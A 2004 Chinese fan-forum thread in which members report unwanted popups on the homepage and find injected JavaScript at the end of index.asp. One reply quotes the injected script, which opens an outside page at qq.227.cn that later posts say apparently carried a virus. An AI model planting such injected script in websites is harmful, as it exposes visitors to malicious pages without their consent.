A4S

 找回密码
 进入圣域
查看: 2552|回复: 38

[提醒!]——首页是否被人加了恶意代码?

[复制链接]
发表于 2004-8-3 13:44 | 显示全部楼层 |阅读模式
好几位朋友都向我反应这个问题,我本人这边看到的也是这种情况

========================================

在2004-8-3 13:14:38,爱尔贝蕾斯给您发送的消息!  
消息标题:请留意一下
--------------------------------------------------------------------------------
我一回到论坛首页就会自动打开一个页面http://qq.227.cn/43101969/,不用担心,是张美女照,不知道是论坛出了问题还是我的机子的毛病,我去别的论坛试了下,没有这个问题,请留意一下:)

========================================


补充库洛洛的截图:

[upload=jpg]UploadFile/2004831515572987.jpg[/upload]


[此贴子已经被作者于2004-8-3 15:02:08编辑过]
回复

使用道具 举报

发表于 2004-8-3 13:49 | 显示全部楼层
我这边一开首页就有那个页面跳出来……
回复 支持 反对

使用道具 举报

发表于 2004-8-3 13:59 | 显示全部楼层
我这里很好,没有这种情况,是否只是你们那里的问题?
回复 支持 反对

使用道具 举报

发表于 2004-8-3 14:16 | 显示全部楼层
我还以为是病毒呢~~~~
偶的IE可以屏蔽广告窗口,所以没有看到~~


[此贴子已经被作者于2004-8-3 14:17:49编辑过]
回复 支持 反对

使用道具 举报

发表于 2004-8-3 14:21 | 显示全部楼层
我这里也出现了,原因....
首页代码未端被加入了这么几句Javascript(不过从跳出来的窗口的代码来看也没有带伤害性的.)

<!-- E路阳光--增加页脚换肤结束 -->
<SCRIPT LANGUAGE=\"javascript\">
<!--
window.open (\'http://qq.227.cn/43101969\')
-->
</SCRIPT>




[此贴子已经被作者于2004-8-3 14:27:27编辑过]
回复 支持 反对

使用道具 举报

发表于 2004-8-3 14:38 | 显示全部楼层
偶这儿也是这样啊,一到论坛首页就弹出一个页面(还好是张mm照)。看来不是偶的机器原因~~~~但是怎么会有这样的事哩?真奇怪。
回复 支持 反对

使用道具 举报

发表于 2004-8-3 14:40 | 显示全部楼层
是不是只要删除 这段代码就可以了? 不过 这个代码是怎么被加上去的?这个原因要查
回复 支持 反对

使用道具 举报

发表于 2004-8-3 14:46 | 显示全部楼层
以下是引用白羽鸟.在2004-8-3 14:40:14的发言:
是不是只要删除 这段代码就可以了? 不过 这个代码是怎么被加上去的?这个原因要查


嗯, 理论上删除index.asp中那段代码就可以了,但是这说明有人能攻击到我们的服务器了,纵火和zhxhjj要注意一下了(不会是他们俩干的吧+_+||||||||||||)

黑客们多得是(估计这个也不是个真正的黑客),不知道哪个无聊的家伙来这消遣咱们圣迷...看来攻击者并无太多恶意,否则......






[此贴子已经被作者于2004-8-3 14:50:16编辑过]
回复 支持 反对

使用道具 举报

发表于 2004-8-3 14:52 | 显示全部楼层
听说 利用动网的漏洞 完全可以入侵服务器  然后黑了你的站~~~~~~~ - -
回复 支持 反对

使用道具 举报

发表于 2004-8-3 14:56 | 显示全部楼层
以下是引用白羽鸟.在2004-8-3 14:52:16的发言:
听说 利用动网的漏洞 完全可以入侵服务器  然后黑了你的站~~~~~~~ - -


这个倒是真的... 有人每天在专门研究这些..... 前几天刚看到说6月份动网新发现的漏洞...不知道热血有没有打上补丁...没想到我们这样的论坛都有人来攻击,给他来一招\"雅典娜的鄙视\",HOHO...
回复 支持 反对

使用道具 举报

 楼主| 发表于 2004-8-3 15:03 | 显示全部楼层
看来必须要启动备用论坛了!

呆会儿我公布一下吧!
回复 支持 反对

使用道具 举报

发表于 2004-8-3 15:12 | 显示全部楼层
我这也有这样的问题!吓死我了!我是在单位上的网啊!还能删去吗!?
回复 支持 反对

使用道具 举报

发表于 2004-8-3 15:13 | 显示全部楼层
可不可以先把那个代码删掉啊?
现在很不方便~~
回复 支持 反对

使用道具 举报

发表于 2004-8-3 15:15 | 显示全部楼层
以下是引用Mercivsky在2004-8-3 15:13:03的发言:
可不可以先把那个代码删掉啊?
现在很不方便~~


问题是不知道FTP密码  没办法修改index.asp文件啊


[此贴子已经被作者于2004-8-3 15:21:06编辑过]
回复 支持 反对

使用道具 举报

发表于 2004-8-3 15:31 | 显示全部楼层
我在怀疑那个弹出的网页是否带毒,因为我的防火墙一直在报警,看来不容忽视啊!
回复 支持 反对

使用道具 举报

发表于 2004-8-3 15:38 | 显示全部楼层
我这里也有啊,我还以为是我的机子中了病毒~!
回复 支持 反对

使用道具 举报

发表于 2004-8-3 16:17 | 显示全部楼层
刚刚又看了一下,发现确实有病毒隐藏在那个弹出的窗口中,不过可能感染不到高版本的IE,我用的是最新的8月1日刚打过补丁的IE...所以没有出现库洛洛那样的现象...

希望大家能引起注意...
回复 支持 反对

使用道具 举报

发表于 2004-8-3 17:26 | 显示全部楼层
幸亏我的浏览器有屏蔽恶意代码的功能!只有警告的声音!
回复 支持 反对

使用道具 举报

发表于 2004-8-3 17:58 | 显示全部楼层
哎~~本来我为了进入首页能看到弹出消息 所以取消了屏蔽
现在看来要重新开启了~~


[此贴子已经被作者于2004-8-3 18:16:44编辑过]
回复 支持 反对

使用道具 举报

发表于 2004-8-3 18:55 | 显示全部楼层
已经删除了……

PS:不知道什么原因?是不是通博客的服务器被入侵……?
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 进入圣域

本版积分规则

广告合作|Archiver|手机版|小黑屋|A4S ( 苏ICP备12080535 )

GMT+8, 2024-11-25 05:01 , Processed in 0.078903 second(s), 8 queries , File On.

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表